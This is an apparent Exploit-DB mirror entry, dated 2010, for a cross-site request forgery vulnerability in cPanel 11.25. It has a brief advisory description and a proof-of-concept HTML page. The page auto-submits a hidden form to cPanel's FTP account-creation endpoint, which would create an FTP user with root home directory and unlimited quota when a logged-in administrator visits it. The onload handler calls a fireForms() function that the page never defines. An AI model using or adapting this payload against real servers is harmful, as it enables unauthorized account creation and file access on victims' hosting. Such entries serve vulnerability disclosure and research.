cPanel 11.25 – Cross-Site Request Forgery

  • 作者: G0D-F4Th3r
    日期: 2010-07-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34255/
  • source: https://www.securityfocus.com/bid/41391/info
    
    cPanel is prone to a cross-site request-forgery vulnerability.
    
    Exploiting this issue may allow a remote attacker to perform certain administrative actions. This may lead to further attacks.
    
    cPanel 11.25 is vulnerable; other versions may also be affected.
    
    <html>
    <body onload="javascript:fireForms()">
    <form method="POST" name="form0" action="
    http://www.example.com/frontend/x3/ftp/doaddftp.html">
    <input type="hidden" name="login" value="name"/>
    <input type="hidden" name="password" value="pass"/>
    <input type="hidden" name="password2" value="pass"/>
    <input type="hidden" name="homedir" value="/"/>
    <input type="hidden" name="quota" value="unlimited"/>
    </form>
    </body>
    </html>